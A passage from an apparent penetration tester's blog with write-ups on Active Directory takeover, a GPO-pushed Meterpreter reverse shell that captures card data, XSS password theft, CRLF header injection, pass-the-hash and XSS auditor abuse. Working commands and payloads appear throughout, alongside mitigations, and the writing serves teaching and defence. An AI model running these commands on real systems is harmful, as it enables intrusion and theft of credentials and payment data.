There was another file in the downloaded zip that, if present, could possibly have allowed Server-Side Request Forgery (SSRF) or directory traversal; however, this was not found during fuzzing of the target, suggesting it had been deleted after deployment. There were also some directory manipulation pieces of code within Spell-Check-Dialog.aspx that take user input as part of a path; however, they don’t appear to do anything too crazy with the file, and a static file extension is appended, making them of limited use. That leaves us with XSS for now, and although I have found some more juicy findings on the bug bounty program, they are more difficult to recreate in a lab environment. It would be nice to release them should the program manager’s client allow this in future.

Timeline

  • 27 December 2019: Reported to the program manager.
  • 29 December 2019: Triaged by the program manager.
  • 03 March 2020: Reported to vendor of HTML Editor as it occurred to me to check whether the latest version was vulnerable when writing this post. A cursory glance suggested it was. No details of any vulnerable targets disclosed to vendor, as the code itself is vulnerable.
  • 28 April 2020: Rewarded $400 from bug bounty program.
  • TBA: Response from vendor.
  • 19 May 2020: Post last updated.

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

24 April 2019 at 20:02

This post details how to bypass firewalls to gain access to the Cardholder Data Environment (or CDE, to use the parlance of our times). End goal: to extract credit card data.

Without intending to sound like a Payment Card Industry (PCI) auditor, credit card data should be kept secure on your network if you are storing, transmitting or processing it. Under the PCI Data Security Standard (PCI-DSS), cardholder data can be sent across your internal network, however, it is much less of a headache if you implement network segmentation. This means you won’t have to have the whole of your organisation in-scope for your PCI compliance. This can usually be achieved by firewalling the network ranges dealing with card data, the CDE, from the rest of your organisation’s network.

Hopefully, the above should outline the basics of a typical PCI setup in case you are not familiar. Now onto the fun stuff.

The company I tested a few years ago had a very large network, all on the standard 10.0.0.0/8 range. Cardholder data was on a separate 192.168.0.0/16 range, firewalled from the rest of the company. Note that all details, including ranges have been changed for the purposes of this post. The CDE mostly consisted of call centre operatives taking telephone orders, and entering payment details into a form on an externally operated web application.

This was an internal test, therefore we were connected to the company’s internal office network on the 10.0.0.0/8 range. Scanning the CDE from this network location with ping and port scans yielded no results:

no-ping

no-ports

The ping scan is basically the same as running the ping command, but nmap can scan a whole range in one run. The “hosts up” count in the second command’s output relates to the fact we’ve given nmap the -Pn argument to tell it not to ping first; nmap will therefore report all hosts in the range as “up” even though they might not be (an nmap quirk).

So unless there was a firewall rule bypass vulnerability, or a weak password for the firewall that could be guessed, going straight in through this route seemed unlikely. Therefore, the first step of the compromise was to concentrate on taking control of Active Directory by gaining Domain Admin privileges.

Becoming Domain Admin

There are various ways to do this, such as this one in my previous post.

In this instance, kerberoast was utilised to take control of the domain. A walk through of the attack, starting off from a position of unauthenticated on the domain follows.

The first step in compromising Active Directory usually involves gaining access to any user account, at any level. As long as it can authenticate to the domain controller in some way, we’re good. In Windows world, all accounts should be able to authenticate with the domain controller, even if they have no permissions to actually do anything on it. At a most basic level, even the lowest privileged accounts need to validate that the password is correct when the user logs in, so this is a reason it works that way.

At this customer’s site, null sessions were enabled on the domain controller. In this case, our domain controller is 10.0.12.100, “PETER”. This allows the user list to be enumerated using tools like enum4linux, revealing the username of every user on the domain:

$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt

enum-started

enum-found

Now we have a user list, we can parse it into a usable format:

$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

enum-extracted-users
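For those who prefer it, the same extraction can be sketched in Python (the sample lines below are illustrative, not real enum4linux output):

```python
import re

def extract_users(lines, domain="MACFARLANE"):
    """Mimic the grep/awk/sed pipeline: keep '(Local User)' entries for the
    domain, drop machine accounts (trailing $), strip the domain prefix."""
    pattern = re.compile(re.escape(domain) + r"\\(\S+)\s+\(Local User\)")
    users = []
    for line in lines:
        match = pattern.search(line)
        if match and not match.group(1).endswith("$"):
            users.append(match.group(1))
    return users

# Hypothetical sample lines in the general shape of enum4linux output.
sample = [
    r"user:[chuck] rid:[0x44f] MACFARLANE\chuck (Local User)",
    r"user:[WS01$] rid:[0x450] MACFARLANE\WS01$ (Local User)",
]
print(extract_users(sample))  # ['chuck']
```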

You may have noticed I’m not into the whole brevity thing. Yes, you can accomplish this with awk, grep, sed and/or even Perl with many fewer characters, however, if I’m on a penetration test I tend to just use whatever works and save my brain power for achieving the main goal. If I’m writing a script that I’m going to use long term, I may be tempted to optimise it a bit, but for pentesting I tend to bash out commands until I get what I need (pun intended).

On the actual test, the network was huge, with over 25,000 active users. However, in my lab network we only have a handful, which should make it easier to demonstrate the hack.

Now we have the user list parsed into a text file, we can then use a tool such as CrackMapExec to guess passwords. Here we will guess if any of the users have “Password1” as their password. Surprisingly enough, this meets the default complexity rules of Active Directory as it contains three out of the four character types (uppercase, lowercase and number).

$ cme smb 10.0.12.100 -u users.txt -p Password1

Wow we have a hit:

cme-password-found

Note that if we want to keep guessing and find all accounts, we can specify the --continue-on-success flag:

cme-continue

So we’ve gained control of a single account. Now we can query Active Directory and bring down a list of service accounts. Service accounts are user accounts that are for… well… services. Think of things like Microsoft SQL Server. When running, this needs to run under the context of a user account. Active Directory’s Kerberos authentication system can be used to provide access, and therefore a “service ticket” is provided by Active Directory to allow users to authenticate to it. Kerberos authentication is outside the scope of this post, however, this is a great write-up if you want to learn more.

Anywho, by requesting the list of Kerberos service accounts from the domain controller, we also get a “service ticket” for each. This service ticket is encrypted using the password of the service account. So if we can crack it, we will be able to use that account, which is usually of high privilege. The Impacket toolset can be used to request these:

$ GetUserSPNs.py -outputfile SPNs.txt -request 'MACFARLANE.EXAMPLE.COM/chuck:Password1' -dc-ip 10.0.12.100

spns

As we can see, one of the accounts is a member of Domain Admins, so this would be a great password to crack.

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

After running hashcat against it, it appears we have found the plaintext password:

spn-cracked

To confirm that this is an actual active account, we can use CrackMapExec again.

$ cme smb 10.0.12.100 -u redrum -p 'murder1!'

spn-user-da

Wahoo, the Pwn3d! shows we have administrator control over the domain controller.

OK, how to use it to get at that lovely card data?

Now, unfortunately for this company, the machines the call centre agents were using within the CDE to take phone orders were on this same Active Directory domain. And although we can’t connect to these machines directly, we can now tell the domain controller to get them to talk to us. To do this we need to dip into Group Policy Objects (GPOs). GPOs allow global, or departmental, settings to be applied to both users and computers. Well, it’s more than that really; however, for the purposes of this post you just need to know that it allows control of computers in the domain on a global or granular level.

Many of the functions of GPO are used to manage settings of the organisational IT. For example, setting a password policy or even setting which desktop icons appear for users (e.g. a shortcut to open the company’s website). Another GPO allows “immediate scheduled tasks” to be run. This is what we’re doing here: creating a script which will run in the call centre and connect back to our machine, giving us control. Here are the steps to accomplish this:

  1. Generate a payload. Here we’re using Veil Evasion. Our IP address is 10.0.12.1, so we’ll point the payload to connect back to us at this address.
    $ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell

  2. Login to the domain controller over Remote Desktop Protocol (RDP), using the credentials we have from kerberoasting.
    rdp

  3. Find the CDE in Active Directory. From our knowledge of the organisation, we know that the call centre agents work on floor 2. We notice Active Directory Users and Computers (ADUC) has an OU of this name:
    aduc-floor2

  4. Drop in the script we made from Veil into a folder, and share this on the domain controller. Set permissions on both the share and the directory to allow all domain users to read.
    dc-share

  5. Within GPO, we create a policy at this level:
    gpo-1

  6. Find the Scheduled Tasks option while editing this new GPO, and create a new Immediate Scheduled Task:
    gpo-2

  7. Create the task to point to the version saved in the share. Also set “Run in logged-on user’s security context” under “common”.
    task

Done!

I waited 15 minutes and nothing happened. I know that group policy can take 90 minutes, plus or minus 30 to update, but I was thinking that at least one machine would have got the new policy by now (note, if testing this in a lab you can use gpupdate /force). Then I waited another five. I was just about to give up and change tack, then this happened:

meterpreter-opened

Running the command to take a screenshot returned exactly what the call centre agent was entering at the time… card data!:

card-data

Card data was compromised, and the goal of the 11.3 PCI penetration test was accomplished.

If we have a look at the session list, we can see that the originating IP is from the 192.168.0.0/16 CDE range:

metasploit-sessions

On the actual test the shells just kept coming, as the whole of the second floor sent a shell back. There was something in the region of 60-100 Meterpreter shells that were opened.

Note that Amazon is used in my screenshot, which is nothing to do with the organisation I’m talking about. In the real test, a script was setup in order to capture screenshots upon a shell connecting (via autorunscript), then we could concentrate on the more interesting sessions, such as those that were part way through the process and were about to reach the card data entry phase.

There are other ways of getting screenshots, such as use espia in Meterpreter, and Metasploit’s post/windows/gather/screen_spy module.

There are methods of doing the GPO step programmatically, which I have not yet tried, such as New-GPOImmediateTask in PowerView.

The mitigation for this would be to always run the CDE in its own separate Active Directory forest; note that a separate domain within the same forest is not a sufficient security boundary. Of course, the defence-in-depth measures of turning off null sessions, encouraging users to select strong passwords, and making sure that any service accounts have crazy long passwords (20+ characters, completely random) are all good. Detecting any user requesting all service tickets in one go, or creating a honeypot service account that raises an alert whenever its service ticket is requested, could help too. It is no good keeping cardholder data safe if a hacker can get to it via the rest of your organisation.

Password Autocomplete and Modern Browsers

8 July 2018 at 16:26

On many penetration test reports (including mine), the following is reported:


Password Field With Autocomplete Enabled

The page contains a form with the following action URL:

https://rob-sec-1.com/blog/autocomplete.php

The form contains the following password field with autocomplete enabled:

password

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker that gains control over the user’s computer. Further, an attacker that finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user’s browser-stored credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete=”off” within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields). Please note that modern web browsers may ignore this directive. In spite of this there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.



Now this one is an awkward one to report, because saving passwords for the user is a good thing. MDN says on the matter:

in-browser password management is generally seen as a net gain for security. Since users do not have to remember passwords that the browser stores for them, they are able to choose stronger passwords than they would otherwise.

I completely agree with this. Password managers (even browser built-in ones) are better than using the same passwords across all sites, or subtle variations on one (monkey1Facebook, monkey1Twitter, etc.).

Users should have their local devices protected (by this I mean mobile devices and desktop machines). This means a password, PIN or fingerprint or equivalent to login, and encryption enabled (FDE, like BitLocker, or device enabled, like Android encryption), to prevent anything being extracted from the file system.

Therefore, the browser storing the password for the use of the user, is of very little risk. The main risk here, is what the Burp description of the vulnerability touches upon above:

cross-site scripting [XSS] may be able to exploit this to retrieve a user’s browser-stored credentials.

Yikes! So XSS could grab the credentials from your browser. To find out whether your browser is vulnerable, I’ve setup a test.

Login to your password manager, click the following link and then enter username: admin and password: secretPassword and when your browser asks you to save your password, do it. Go!

Then try the next link preloaded with this juicy XSS payload

<script>
document.body.onload = function() {
    setTimeout(function() {
        alert(document.getElementById('password').value)
    }, 1000)
}
</script>

The one second delay is to give the browser time to complete the form. However, this can be altered with the delay parameter in case your browser needs longer.

Test

So if an alert box is shown with your password, your browser or password manager is vulnerable. In a real attack there will be no alert box; the attacker sends the password (and of course the username, using the same method) cross-domain to their site like this (open dev tools or Burp to see the background request).

The next link has autocomplete off. There are two tests you can do here.

  1. Find out whether your password is still completed from before. Many modern browsers ignore the autocomplete directive.
  2. Don’t do this test yet, but if you try a new login (e.g. root and pass), see whether your browser prompts you to save.

Autocomplete Off

The second test may prevent your browser from auto-filling anything in future on this domain without you manually clicking (as you now have two possible logins to the site). Delete one of the logins from your browser/manager if you tried this test.

If your browser still autocompletes, this shows that setting autocomplete=off is pretty pointless for users with the same browser and password manager combination.

Attacker Injected Form

If autocomplete=off made a difference to the above, then the point of my post is to show you whether an attacker-injected form could re-enable autocomplete and then capture your credentials, should a cross-site scripting vulnerability exist on the site and you were unlucky enough to follow an attacker-controlled link.

Before starting, make sure you only have one login saved. See the following guide on how to delete passwords if you tried the second test above. Click this link then your browser version and click back to return to this site: How to delete passwords.

This one has autocomplete off, however, an attacker injects their own form tag via the XSS vector, with autocomplete on to try and grab the password from it:

Attacker Injected Form

This works by closing the original form in the HTML, and then opening another one without autocomplete disabled before injecting the script:

</form><form><script...

If this test worked, but the second test didn’t, then removing autocomplete from a form is like closing the stable door after the horse has bolted: the password has already been saved, and any future XSS attack can grab it.

Firefox 61, Edge 42 and IE 11 appear to be vulnerable, so if you have cross-site scripting on your site and a user has saved passwords, then the attacker can trivially grab the login details should their XSS link be followed. Chrome 67 appears to pre-fill the password, however, the script alert is empty, suggesting that Chrome has some clever logic built-in preventing script from retrieving it. I wonder if there’s a way around this for an attacker…? Maybe an idea for a future post.

The solution to this would be to use a password manager that requires the user to click before completing the password. This would stop a cross-site scripting attack from sending the password to the attacker automatically. Of course, if the user then proceeded to log in, the cross-site scripting could have attached an event handler to the password field in order to send the password once it had been entered. Changing your password manager will, however, guard against completely automated attacks that do not require further user interaction.

So to avoid being a victim yourself:

  • If the “attacker injected form” test gets your password, switch to a password manager that requires you to click before completing your login details.
  • For sensitive sites, bookmark the logon page and always follow your bookmark when logging in, never follow links from emails, other sites or from messages.

From a pentesting perspective it looks like we’re stuck reporting it, especially for PCI tests:

there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.

So to sum up, password managers are great and increase overall security. However, if they complete forms without asking, they make an attacker’s work easy.

Defeating Content-Disposition

16 April 2018 at 23:00

The Content-Disposition response header tells the browser to download a file rather than displaying it in the browser window.

Content-Disposition: attachment; filename="filename.jpg"

For example, even though this HTML outputs <script>alert(document.domain)</script>, because of the header telling the browser to download, it means that no Same Origin Policy bypass is achieved:

Save As

This is a great mitigation for cross-site scripting where users are allowed to upload their own files to the system. HTML files are the greatest threat: a user uploading an HTML file containing script can instantly refer others to the download link. If the browser does not force the content to download, the script will execute in the context of the download URL’s domain, giving the uploader access to the client-side of the victim’s session (the victim being the one that clicked the link). Of course, you could serve any downloads from another domain; however, if only authorised users should have access to the file then this means implementing some cross-domain authentication system, which could be prone to security flaws in its own right. Note that ideally (from the attacker’s perspective), any uploads should be downloadable by other users, or should at least be shareable, otherwise we are only in self-XSS territory here, which in my opinion is a non-vuln.
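As a sketch (mine, not the tested application’s code), the server side of this mitigation is just a matter of setting the right response headers on the download handler:

```python
def download_headers(filename, content_type):
    """Build response headers that force a download rather than rendering.
    Assumes filename has already been sanitised server-side."""
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",  # stop browser MIME sniffing
        "Content-Disposition": f'attachment; filename="{filename}"',
    }

headers = download_headers("upload.htm", "text/html")
print(headers["Content-Disposition"])  # attachment; filename="upload.htm"
```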

As well as the obvious HTML, there are also ways to bypass the SOP by uploading Flash or a PDF and then embedding the upload on the attacker’s page.

So… can Content-Disposition be bypassed? There were a few old methods that relied on either Internet Explorer caching bugs or Firefox bugs:

(Links stolen from here.)

Well on a pentest some time ago, I found another way. Admittedly, this was unique to the application, however, I’m sure it will not be the only one vulnerable in this way.

The application in question included a page designer, and the page designer widget allowed images to be uploaded to be included in the page. Upload functionality can be a gold mine for pentesters, so I immediately got testing it. Unfortunately, trying to upload a file of type text/html gave a 400 Bad Request. In fact, trying to upload anything except images gave the same response. Even when the client gave me access to the source code, I validated it and the code appeared sound: it only allowed uploads from a white-list of permitted types.

If a file was uploaded, it was downloaded by the browser in a response that included the content-disposition header:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:19:25 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: image/png
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=foobar.png
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, what the client appeared to have forgotten was that there was a back-end API service, and that normal users could authenticate to this service by passing their app username and password in a basic auth header.

This header is a request header and is in the following format:

Authorization: <type> <credentials>

In the basic mode this is:

Authorization: basic base64(username:password)

So to demonstrate, you can use an online tool such as this one. If your username is foo and your password is bar you would pass in the following header:

Authorization: basic Zm9vOmJhcg==

This is foo:bar base64’d.
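We can verify the encoding with a couple of lines of Python (note that the correctly padded value ends in two equals signs):

```python
import base64

# Base64-encode the username:password pair, as basic auth requires.
credentials = base64.b64encode(b"foo:bar").decode()
print(credentials)                            # Zm9vOmJhcg==
print(f"Authorization: basic {credentials}")  # Authorization: basic Zm9vOmJhcg==
```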

Passing this to the API, which was publicly available but ran on port 8875, allowed access to its functions as the authenticated user.

The first flaw I found was that the API allowed any content type to be uploaded, even those that were disallowed when using the web UI:

POST /store/data/files HTTP/1.1
Host: 10.10.65.26:8875
Content-Length: 453
Content-Type: application/json
User-Agent: curl
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Authorization: basic Zm9vOmJhcg==
Accept: */*

{"name": "xss.htm", "data": "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+", "type": "text/html"}
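As a sketch, the same upload request could be reproduced with Python's standard library (the host, path and field names are illustrative recreations, not the real application's):

```python
import base64
import json
import urllib.request

# Illustrative recreation of the API upload request
payload = '<script>alert(document.domain)</script>'
body = json.dumps({
    "name": "xss.htm",
    "data": base64.b64encode(payload.encode()).decode(),
    "type": "text/html",
}).encode()

req = urllib.request.Request(
    "http://10.10.65.26:8875/store/data/files",
    data=body,
    method="POST",
)
req.add_header("Content-Type", "application/json")
req.add_header("Authorization",
               "basic " + base64.b64encode(b"foo:bar").decode())
# urllib.request.urlopen(req)  # would return the {"_key": ...} JSON on success
```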

Obviously, this is simplified and anonymised from the original app. Anyway, this gave the following HTTP response:

HTTP/1.1 201 Created
<snip>
{"_key":"10000006788421"}

Requesting the file actually returned the uploaded content type:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:24:11 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, that pesky content-disposition header was preventing us from gaining XSS.

What I next tried was setting the type to text/html\r\nfoo:bar, thinking that this would not work. However, it uploaded fine, and upon requesting the download I got the injected header returned:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:44:35 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
foo:bar
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

Interesting… My first go at bypassing content-disposition was to inject a second content-disposition header, hoping the browser would act on the first one:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:45:52 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
content-disposition: inline
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, the browser flagged this with the following error, which I’ve never seen the likes of before:

Duplicate Content-Disposition

After a bit of thought, I came up with the following payload instead:

POST /store/data/files HTTP/1.1
Host: 10.10.65.26:8875
Content-Length: 453
Content-Type: application/json
User-Agent: curl
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Authorization: basic Zm9vOmJhcg==
Accept: */*

{"name": "xss.htm", "data": "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+", "type": "text/html\r\n\r\n"}

This gave me the ID as before:

HTTP/1.1 201 Created
<snip>
{"_key":"10000006788444"}

And requesting

https://10.10.65.26/en-GB/files/10000006788444/download

gave the XSS:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 17:34:21 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html

Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

Alert

This is due to the injected carriage-return and linefeed which causes the browser to interpret the second, original, content-disposition header as part of the HTTP body, and therefore ignored as a directive to tell the browser to download. Of course, this does need some social engineering as you would require your victim to follow the link to the downloaded file to trigger the JavaScript in their login context.
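A simplified model of why this works: like any HTTP client, the browser treats everything after the first blank line as the response body, so the injected \r\n\r\n pushes the original content-disposition out of the header block:

```python
# Simplified model of HTTP response parsing: the body starts at the
# first blank line, so a value injected with \r\n\r\n ends the headers early.
raw = (
    "Content-Type: text/html\r\n"
    "\r\n"  # injected blank line: everything below is now body
    "content-disposition: attachment;filename=xss.htm\r\n"
    "\r\n"
    "<script>alert(document.domain)</script>"
)

headers, body = raw.split("\r\n\r\n", 1)
print("content-disposition" in headers)  # False: no longer a header
print("content-disposition" in body)     # True: now just page content
```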

Gaining Domain Admin from Outside Active Directory

4 March 2018 at 11:06

…or why you should ensure all Windows machines are domain joined.

This is my first non-web post on my blog. I’m traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, Active Directory testing has become my favourite type of penetration test.

This post is regarding an internal network test I undertook some years back. This client’s network is a tough nut to crack, and one I’ve tested before so I was kind of apprehensive of going back to do this test for them in case I came away without having “hacked in”. We had only just managed it the previous time.

The first thing I run on an internal is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this fact from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there’s no point in breaking in through a skylight if the front door is open.

So I ran Responder, and I was surprised to see the following hash captured:

responder

Note of course, that I would never reveal client confidential information on my blog, therefore everything you see here is anonymised and recreated in the lab with details changed.

Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK.

Checking this host’s NetBIOS information with Crack Map Exec (other tools are available), we can determine whether this is a local account hash. If it is, the “domain” part of the username:

[SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK

i.e. 2-FD-87622 should match the host’s NetBIOS name if this is the case. Looking up the IP with CME we can see the name of the host matches:

netbios

So the next port of call is to try to crack this hash and recover the plaintext password. Hashcat was loaded against rockyou.txt and rules, and quickly cracked the password.

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

hashcat

Now we have a set of credentials for the front desk machine. Hitting the machine again with CME but this time passing the cracked credentials:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

admin on own machine

We can see Pwn3d! in the output showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

SAM hashes

Note we can see

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 “challenge/response” hash that Responder caught earlier. Responder catches hashes over the wire, and these are different to the format that Windows stores in the SAM.

The next step was to try the local administrator hash and spray it against the client’s server range. Note that we don’t even have to crack this administrator password, we can simply “pass-the-hash”:

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth

admin password reuse

We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an “SMB relay” attack instead).

To our surprise, it got a hit, the local administrator password had been reused on the STEWIE machine. Querying this host’s NetBIOS info:

$ cme smb 172.16.157.134 
SMB         172.16.157.134  445    STEWIE           
[*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE)
(signing:False) (SMBv1:True)

We can see it is a member of the MACFARLANE domain, the main domain of the client’s Active Directory.

So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM hash as the password, which will cause Metasploit to pass-the-hash.

metasploit options

Once run, our shell is gained:

ps exec shell

We can load the Mimikatz module and read Windows memory to find passwords:

mimikatz

Looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely for a POC, in real life or to remain more stealthy we could just use the discovered account).

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add'

add da

Note the use of the undocumented /y switch to suppress the prompt Windows gives you when adding a password longer than 14 characters.

A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation:

da proof

So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn’t have gained the initial access to it and leveraged its secrets in order to compromise the whole domain. Of course there are other mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here).

How to Use X-XSS-Protection for Evil

10 February 2018 at 19:33

Two important headers that can mitigate XSS are:

  • X-XSS-Protection
  • Content-Security-Policy

So what is the difference?

Well browsers such as Internet Explorer and Chrome include an “XSS auditor” which attempts to help prevent reflected XSS from firing. The first header controls that within the browser.

Details are here, but basically the four supported options are:

X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>

It should be noted that the auditor is active by default, unless the user (or their administrator) has disabled it.

Therefore,

X-XSS-Protection: 1

will turn it back on for the user.

The second header, Content Security Policy, is a newer header that controls where an HTML page can load its content from, including JavaScript. Basically including anything other than unsafe-inline as a directive means that injected JavaScript into the page will not execute, and can mitigate both reflected and stored XSS. CSP is a much larger topic than I’m going to cover here, however, detailed information regarding the header can be found here.

What I wanted to show you is the difference between specifying block and either omitting the header entirely (in which case the browser’s own setting applies) or specifying 1 without block. Also, for good measure, I will show you the Content Security Policy mitigation for cross-site scripting.

I will show you a way that if a site has specified X-XSS-Protection without block, how this can be abused.

The linked page has the following code in it:

<script>document.write("one potato")</script><br />
<script>document.write("two potato")</script><br />
three potato

Now if we link straight there from the current page you’re reading, the two script blocks should fire:

normal

To demonstrate how the XSS auditors work, let’s imagine we tried to inject that script into the page ourselves by appending this query string:

?xss1=<script>document.write("one potato")</script>&xss2=<script>document.write("two potato")</script>

Note that the following will not work in Firefox, as at the time of writing Firefox doesn’t include any XSS auditor and is therefore very open to reflected XSS should the visited site be vulnerable. There is the add-on NoScript that you can use to protect yourself, should Firefox be your browser of choice. Note the following has been tested in Chrome 64 only. I will also enable your XSS filter in supported browsers by adding X-XSS-Protection: 1 to the output.

injected

Note how the browser now thinks that the two script blocks have been injected, and therefore blocks them and only outputs the plain HTML. View source to see the code if you don’t believe it is still there.

Viewing F12 developer tools shows us the auditor has done its stuff:

Chrome F12

Viewing source shows us which script has been blocked in red:

Source code

Now what could an attacker do to abuse the XSS auditor? Well they could manipulate the page to prevent scripts of their choosing to be blocked.

?xss2=<script>document.write("two potato")</script>

abused

Viewing the source shows the attacker has just blocked what they wanted by specifying the source code in the URL:

abused source code

Of course, editing their own link is fruitless; they would have to pass the link onto their victim(s) in some way, such as sending it via email, Facebook, Skype, etc …

What are the risks in this? Well The Web Application Hacker’s Handbook puts it better than I could:

web app hackers handbook quote

So, how can we defend against this? Well, you guessed it, the block directive:

X-XSS-Protection: 1; mode=block

So let’s try this again with that specified:

abused but blocked

So by specifying block we can prevent an attacker from crafting links that neutralise our existing script!

So in summary, it is always good to specify block, as by default XSS auditors only attempt to block what they think is being injected, which might not actually be the evil script itself.

Content Security Policy then?

Just to demo the difference, if we output a CSP header that prevents inline script and don’t attempt to inject anything:

CSP example image

Chrome shows us this is solely down to Content Security Policy:

csp chrome error

To get round this as site developers, we can either specify the script’s SHA-256 hash in our CSP, or simply move our code to a separate .js file, as long as we white-list self in our policy. Any attacker injecting inline script will be foiled. Of course, the problem with Content Security Policy is that it still seems to be an afterthought, and trying to come up with a policy that fits an existing site is very hard unless your site is pretty much static. However, it is a great mitigation if done properly. Any weaknesses in the policy, though, may be ripe for exploitation. Hopefully I’ll have a post on that in the future if I come across it in any engagements.
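As an illustration (not the policy of any site discussed here), a policy allowing scripts only from the site’s own origin would look like this; any injected inline script then fails the script-src check:

```http
Content-Security-Policy: default-src 'self'; script-src 'self'
```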

*Yeh yeh, you’re not using X-XSS-Protection for evil, but lack of block of course, and if no-one has messed with the browser settings it is as though X-XSS-Protection: 1 has been output.

Hidden XSS

3 February 2018 at 15:16

On a web test once I was having trouble finding any instances of cross-site scripting, which is very unusual.

However, after scanning the site with nikto, some interesting things came up:

$ nikto -h rob-sec-1.com
- ***** RFIURL is not defined in nikto.conf--no RFI tests will run *****
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          193.70.91.5
+ Target Hostname:    rob-sec-1.com
+ Target Port:        80
+ Start Time:         2018-02-03 15:37:18 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie v created without the httponly flag
+ Root page / redirects to: /?node_id=V0lMTCB5b3UgYmUgcmlja3JvbGxlZD8%3D
+ Server leaks inodes via ETags, header found with file /css, inode: 0x109c8, size: 0x56, mtime: 0x543795d00f180;56450719f9b80
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /css: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 4197 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-02-03 15:40:15 (GMT0) (177 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Particularly this:

+ OSVDB-3092: /test/: This might be interesting...

So I navigated to /test/ and saw this at the top of the page:

Test URL in browser

So the page had the usual content, however, there appeared to be some odd text at the top, and because it said NULL this struck me as some debug output that the developers had left in on the production site.

